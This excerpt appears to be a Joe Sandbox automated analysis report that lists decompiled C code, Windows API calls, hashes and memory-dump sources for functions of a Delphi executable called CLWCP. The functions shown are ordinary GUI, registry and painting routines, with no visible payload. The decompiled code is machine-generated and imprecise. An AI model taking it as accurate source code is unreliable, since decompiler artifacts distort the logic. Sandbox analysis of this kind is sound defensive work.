                                  • Opcode ID: c09162704ac1e934787fd2227a4e1fe3f717f811c17c74f6c2f2b104b6167452
                                  • Instruction ID: 6f6f27f1fb9a78ea227cb9754e907486e2dafd73f8089408630f3b53a79743ea
                                  • Opcode Fuzzy Hash: c09162704ac1e934787fd2227a4e1fe3f717f811c17c74f6c2f2b104b6167452
                                  • Instruction Fuzzy Hash: 96411A70904658CFDB11DF65CC85BDAB7F4EB49304F4040EAE908AB291D774AE84CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403210, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E00403210() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x46e020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x46e020 & 0xffc0 | _v12 & 0x3f;
					 *0x46e020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403281);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403288);
					return RegCloseKey(_v8);
				}
			}











                                  0x00403211
                                  0x00403213
                                  0x0040321d
                                  0x00403239
                                  0x0040329b
                                  0x0040329e
                                  0x004032a7
                                  0x0040323b
                                  0x0040323d
                                  0x0040323e
                                  0x00403243
                                  0x00403246
                                  0x00403249
                                  0x00403265
                                  0x0040326c
                                  0x0040326f
                                  0x00403272
                                  0x00403280
                                  0x00403280

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403232
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403265
                                  • RegCloseKey.ADVAPI32(?,00403288,00000000,?,00000004,00000000,00403281,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040327B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 58a75b2bac7bf4a37c1488f90b8c34e71babaf06b403cd3fc2ae2735448a84f6
                                  • Instruction ID: cab1c7fee685f1fe76339523710d5680e59c356854c230eb671b1019d153b585
                                  • Opcode Fuzzy Hash: 58a75b2bac7bf4a37c1488f90b8c34e71babaf06b403cd3fc2ae2735448a84f6
                                  • Instruction Fuzzy Hash: A2019679954358BADB11DF918C52BB977ECEB08701F5005BAF900F25D0F6B85A10C659
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004028F8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004028F8(signed int __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				signed int _t20;
				void* _t24;
				CHAR* _t25;

				_t24 = __edx;
				_t20 = __eax;
				if(__eax != 0) {
					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t25);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t20 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E0040438C(_t24, 0x105,  &_v532);
			}










                                  0x00402900
                                  0x00402902
                                  0x00402906
                                  0x0040290f
                                  0x00402912
                                  0x00402917
                                  0x00402929
                                  0x0040292f
                                  0x0040292f
                                  0x0040293e
                                  0x00402945
                                  0x0040294f
                                  0x0040294f
                                  0x0040296c

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00402929
                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040292F
                                  • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040293E
                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046BBFA,00000000,0046BE62,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040294F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID: :
                                  • API String ID: 1611563598-336475711
                                  • Opcode ID: 3e2442db38f5bda1c3f6f293308f7a4606ce689a66b1a96b8a5eabdafcaaaf49
                                  • Instruction ID: b1601ac6971bab8264e6e372215e5814cb497fd83d5e843998c4f9eb75ab4268
                                  • Opcode Fuzzy Hash: 3e2442db38f5bda1c3f6f293308f7a4606ce689a66b1a96b8a5eabdafcaaaf49
                                  • Instruction Fuzzy Hash: 7CF096712447C01AD310F6658852BEB72DC8F90304F04446EBAD8E73C2E6B8894C8767
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445A3C, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00445A3C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v8 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x445c20);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00447A20(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044927C(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004041B4( &_v8, _v16);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404528(_v8, 0x445c44);
					if(_t153 != 0) {
						E0041DF94( *((intOrPtr*)(_v12 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v12 + 0xc));
							__eflags = E0041D93C( *((intOrPtr*)(_v12 + 0xc))) |  *0x445c48;
							E0041D948( *((intOrPtr*)(_v12 + 0xc)), E0041D93C( *((intOrPtr*)(_v12 + 0xc))) |  *0x445c48, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004043DC(_v8);
							_t65 = E004045DC(_v8);
							DrawTextA(E0041E8D0(_v12), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x445c27);
							return E0040411C( &_v8);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041D63C( *((intOrPtr*)(_v12 + 0xc)), 0xff000014);
								_t89 = E004043DC(_v8);
								_t91 = E004045DC(_v8);
								DrawTextA(E0041E8D0(_v12), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041D63C( *((intOrPtr*)(_v12 + 0xc)), 0xff000010);
							} else {
								_t76 = E0041D170(0xff00000d);
								_t78 = E0041D170(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041D63C( *((intOrPtr*)(_v12 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E0041E8D0(_v12),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v8 == 0) {
						L11:
						E004043E4( &_v8, 0x445c38);
						goto L12;
					}
					if( *_v8 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v8 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                  0x00445a3c
                                  0x00445a3d
                                  0x00445a47
                                  0x00445a4a
                                  0x00445a4d
                                  0x00445a50
                                  0x00445a52
                                  0x00445a57
                                  0x00445a58
                                  0x00445a5d
                                  0x00445a60
                                  0x00445a65
                                  0x00445a6a
                                  0x00445a6e
                                  0x00445a7e
                                  0x00445a8d
                                  0x00445a90
                                  0x00445a95
                                  0x00445a95
                                  0x00445a95
                                  0x00445a80
                                  0x00445a83
                                  0x00445a83
                                  0x00445a98
                                  0x00445a98
                                  0x00445aa4
                                  0x00445aac
                                  0x00445ad2
                                  0x00445ada
                                  0x00445adf
                                  0x00445b1d
                                  0x00445b22
                                  0x00445b26
                                  0x00445b2b
                                  0x00445b37
                                  0x00445b3f
                                  0x00445b3f
                                  0x00445b44
                                  0x00445b48
                                  0x00445be5
                                  0x00445bed
                                  0x00445bf6
                                  0x00445c05
                                  0x00445c0a
                                  0x00445c0c
                                  0x00445c0f
                                  0x00445c12
                                  0x00445c1f
                                  0x00445b4e
                                  0x00445b4e
                                  0x00445b52
                                  0x00445b5c
                                  0x00445b6c
                                  0x00445b79
                                  0x00445b82
                                  0x00445b91
                                  0x00445b9e
                                  0x00445b9e
                                  0x00445ba3
                                  0x00445ba7
                                  0x00445bd5
                                  0x00445be0
                                  0x00445ba9
                                  0x00445bae
                                  0x00445bba
                                  0x00445bbf
                                  0x00445bc1
                                  0x00000000
                                  0x00000000
                                  0x00445bce
                                  0x00445bce
                                  0x00000000
                                  0x00445ba7
                                  0x00445b48
                                  0x00445ae4
                                  0x00445af2
                                  0x00445af3
                                  0x00445af4
                                  0x00445af5
                                  0x00445af6
                                  0x00445b0b
                                  0x00445b0b
                                  0x00000000
                                  0x00445aae
                                  0x00445ab2
                                  0x00445ac5
                                  0x00445acd
                                  0x00000000
                                  0x00445acd
                                  0x00445aba
                                  0x00000000
                                  0x00000000
                                  0x00445abf
                                  0x00445ac3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00445ac3

                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00445B0B
                                  • OffsetRect.USER32(?,00000001,00000001), ref: 00445B5C
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445B91
                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 00445B9E
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00445C05
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: e9c0beef831d1077894a4c71e02107e84e70ffbe6751cc46d9003b4ddecf09b5
                                  • Instruction ID: c06e556faa945d11c833d22b4857b2b2ecd232d66721c921e163764fa6025cba
                                  • Opcode Fuzzy Hash: e9c0beef831d1077894a4c71e02107e84e70ffbe6751cc46d9003b4ddecf09b5
                                  • Instruction Fuzzy Hash: 2A5171B0A00644AFEF10EBA9C882B9F77A5AF45324F144566F914A7393C73CAD418719
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432400, Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E00432400(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				signed int _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t113 = E00432848(_a4 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x46fc50; // 0x470b40
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5 & 0x000000ff;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043BA58(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t106 =  *0x4309d0; // 0x430a1c
						__eflags = E00403524( *_t19, _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E0043BA58( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00432394);
						_push(GetCurrentThreadId());
						L0040667C();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00403594(_t101, _t126);
						_t78 =  *0x470ac0; // 0x0
						_t110 =  *0x42f238; // 0x42f284
						if(E00403524(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x470ac0; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x40)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x470ac0; // 0x0
						if(E0043BA58( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x40)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043BA58(_t116);
					goto L19;
				}
				_t117 = E004318A4(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043BA58(_t117);
					goto L6;
				}
			}































                                  0x00432400
                                  0x00432409
                                  0x0043240b
                                  0x0043241a
                                  0x0043241c
                                  0x00432422
                                  0x00432427
                                  0x00432432
                                  0x0043245b
                                  0x0043245f
                                  0x0043258e
                                  0x00432598
                                  0x00432598
                                  0x00432465
                                  0x0043246b
                                  0x0043246b
                                  0x00432470
                                  0x00000000
                                  0x00000000
                                  0x00432469
                                  0x00432469
                                  0x00432479
                                  0x0043247b
                                  0x00432481
                                  0x00000000
                                  0x00000000
                                  0x0043248a
                                  0x0043248d
                                  0x00432492
                                  0x004324b3
                                  0x004324b6
                                  0x004324c1
                                  0x004324c3
                                  0x004324d5
                                  0x004324d7
                                  0x004324c5
                                  0x004324c8
                                  0x004324d0
                                  0x004324d0
                                  0x004324da
                                  0x004324da
                                  0x004324de
                                  0x004324e4
                                  0x004324ea
                                  0x004324f0
                                  0x004324f1
                                  0x004324fb
                                  0x004324fc
                                  0x00432501
                                  0x00432505
                                  0x00000000
                                  0x00000000
                                  0x00432513
                                  0x0043251e
                                  0x00432523
                                  0x00432533
                                  0x00432538
                                  0x0043253d
                                  0x0043254a
                                  0x00432575
                                  0x00432588
                                  0x0043258a
                                  0x0043258a
                                  0x00000000
                                  0x00432588
                                  0x0043254c
                                  0x0043255b
                                  0x00000000
                                  0x00000000
                                  0x0043255d
                                  0x00432573
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00432573
                                  0x00432497
                                  0x0043249d
                                  0x0043249d
                                  0x004324a2
                                  0x00000000
                                  0x00000000
                                  0x0043249b
                                  0x0043249b
                                  0x004324ab
                                  0x00000000
                                  0x004324ab
                                  0x0043243c
                                  0x00432440
                                  0x00000000
                                  0x00432446
                                  0x0043244a
                                  0x0043244a
                                  0x0043244f
                                  0x00000000
                                  0x00000000
                                  0x00432448
                                  0x00432448
                                  0x00432458
                                  0x00000000
                                  0x00432458

                                  APIs
                                    • Part of subcall function 00432848: WindowFromPoint.USER32(00432628,52FF108B,00000000,0043241A,?,-00000010,?), ref: 0043284E
                                    • Part of subcall function 00432848: GetParent.USER32(00000000), ref: 00432865
                                  • GetWindow.USER32(00000000,00000004), ref: 00432422
                                  • GetCurrentThreadId.KERNEL32 ref: 004324F6
                                  • 72E7AC10.USER32(00000000,00432394,?,00000000,00000004,?,-00000010,?), ref: 004324FC
                                  • GetWindowRect.USER32 ref: 00432513
                                  • IntersectRect.USER32 ref: 00432581
                                    • Part of subcall function 004318A4: GetWindowThreadProcessId.USER32(00000000), ref: 004318B1
                                    • Part of subcall function 004318A4: GetCurrentProcessId.KERNEL32(?,0046D588,00000000,00457BE5,?,?,0046D588,00000001,004561E4,?,00000000,00000000,00000000,00000001), ref: 004318BA
                                    • Part of subcall function 004318A4: GlobalFindAtomA.KERNEL32 ref: 004318CF
                                    • Part of subcall function 004318A4: GetPropA.USER32 ref: 004318E6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                  • String ID:
                                  • API String ID: 2049660638-0
                                  • Opcode ID: 757823552c05de86af775d799432cde189d07084c99be117a624007f582b3a2a
                                  • Instruction ID: 11c8f926a30ad56374298975a4b6a71b72278f772d832f1b988da34334fedd95
                                  • Opcode Fuzzy Hash: 757823552c05de86af775d799432cde189d07084c99be117a624007f582b3a2a
                                  • Instruction Fuzzy Hash: 76516D31A00209AFCB10DF69C980BAEB7F4AF0C354F149566F815EB391D778EE418B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004394B4, Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E004394B4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				struct HDC__* _v20;
				struct tagPAINTSTRUCT _v84;
				void* _t65;
				intOrPtr _t73;
				void* _t84;
				void* _t85;
				intOrPtr _t101;
				intOrPtr _t107;
				int _t109;
				void* _t112;
				void* _t114;
				void* _t115;
				intOrPtr _t116;

				_t114 = _t115;
				_t116 = _t115 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v12 + 4));
				if(_v20 == 0) {
					_v20 = BeginPaint(E0043BA58(_v8),  &_v84);
				}
				_push(_t114);
				_push(0x439601);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t116;
				if( *((intOrPtr*)(_v8 + 0x1a0)) != 0) {
					_v16 = SaveDC(_v20);
					_push(_t114);
					_push(0x4395c4);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t116;
					_t109 = 2;
					_t84 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x1a0)) + 8)) - 1;
					if(_t84 >= 0) {
						_t85 = _t84 + 1;
						_t112 = 0;
						do {
							_t65 = E00413D2C( *((intOrPtr*)(_v8 + 0x1a0)), _t112);
							if( *((char*)(_t65 + 0x57)) != 0 || ( *(_t65 + 0x1c) & 0x00000010) != 0 && ( *(_t65 + 0x51) & 0x00000004) == 0) {
								if(( *(_t65 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_t109 = ExcludeClipRect(_v20,  *(_t65 + 0x40),  *(_t65 + 0x44),  *(_t65 + 0x40) +  *((intOrPtr*)(_t65 + 0x48)),  *(_t65 + 0x44) +  *((intOrPtr*)(_t65 + 0x4c)));
									if(_t109 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t112 = _t112 + 1;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					L12:
					if(_t109 != 1) {
						 *((intOrPtr*)( *_v8 + 0xc4))();
					}
					_pop(_t101);
					 *[fs:eax] = _t101;
					_push(0x4395cb);
					return RestoreDC(_v20, _v16);
				} else {
					 *((intOrPtr*)( *_v8 + 0xc4))();
					E00439638(_v8, 0, _v20);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x439608);
					_t73 = _v12;
					if( *((intOrPtr*)(_t73 + 4)) == 0) {
						return EndPaint(E0043BA58(_v8),  &_v84);
					}
					return _t73;
				}
			}



















                                  0x004394b5
                                  0x004394b7
                                  0x004394bd
                                  0x004394c0
                                  0x004394c9
                                  0x004394d0
                                  0x004394e4
                                  0x004394e4
                                  0x004394e9
                                  0x004394ea
                                  0x004394ef
                                  0x004394f2
                                  0x004394ff
                                  0x0043951d
                                  0x00439522
                                  0x00439523
                                  0x00439528
                                  0x0043952b
                                  0x0043952e
                                  0x0043953f
                                  0x00439542
                                  0x00439544
                                  0x00439545
                                  0x00439547
                                  0x00439552
                                  0x0043955b
                                  0x0043956d
                                  0x00000000
                                  0x0043956f
                                  0x0043958d
                                  0x00439592
                                  0x00000000
                                  0x00000000
                                  0x00439592
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00439594
                                  0x00439594
                                  0x00439595
                                  0x00439595
                                  0x00439547
                                  0x00439598
                                  0x00439599
                                  0x004395a3
                                  0x004395a3
                                  0x004395ab
                                  0x004395ae
                                  0x004395b1
                                  0x004395c3
                                  0x00439501
                                  0x00439509
                                  0x004395d3
                                  0x004395da
                                  0x004395dd
                                  0x004395e0
                                  0x004395e5
                                  0x004395ec
                                  0x00000000
                                  0x004395fb
                                  0x00439600
                                  0x00439600

                                  APIs
                                  • BeginPaint.USER32(00000000,?,?,?,00000000), ref: 004394DF
                                  • SaveDC.GDI32(00000000), ref: 00439518
                                  • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,004395C4,?,00000000,00439601,?,?,?,00000000), ref: 00439588
                                  • RestoreDC.GDI32(00000000,?), ref: 004395BE
                                  • EndPaint.USER32(00000000,?,00439608,00000000), ref: 004395FB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 8936a3461feb65e48ca4021b3cb4e1951cc4dba6cc6501400b223db0571c4e37
                                  • Instruction ID: 64686e9327c25701a29f256189671e7687facbd6c337227c654a30a6c5105c60
                                  • Opcode Fuzzy Hash: 8936a3461feb65e48ca4021b3cb4e1951cc4dba6cc6501400b223db0571c4e37
                                  • Instruction Fuzzy Hash: BB419D71A04208AFDB05CFA8C895EAEB7F4FF4C314F1554AAE505973A1C7B8AD40CB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044587C, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044587C(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044587C(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E004459AC(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E004459AC(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E004459AC(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0044573C(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x444374; // 0x4443c0
						if(E00403524( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E004459AC(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                  0x0044587c
                                  0x00445880
                                  0x00445886
                                  0x00445890
                                  0x00445892
                                  0x00000000
                                  0x00445892
                                  0x0044589b
                                  0x004458a0
                                  0x00000000
                                  0x004458a2
                                  0x004458b4
                                  0x004458b9
                                  0x004458bd
                                  0x004458c2
                                  0x004458cb
                                  0x004458d5
                                  0x004458dc
                                  0x004458ec
                                  0x004458f1
                                  0x004458f1
                                  0x004458f3
                                  0x004458f4
                                  0x004458fa
                                  0x00445900
                                  0x00445935
                                  0x00445937
                                  0x0044593c
                                  0x00000000
                                  0x00445942
                                  0x00445905
                                  0x00445912
                                  0x00000000
                                  0x00445925
                                  0x00445929
                                  0x00445930
                                  0x00000000
                                  0x00445930
                                  0x00445912
                                  0x004458fa
                                  0x00445949

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 944ef568eef76c73b7a802f34b7c54b463d944010535fe161b9c98e8645b4c76
                                  • Instruction ID: d5d07dc8af189ccfc6548430fc742ef2699b64d7b4002300a91c988daa0df7aa
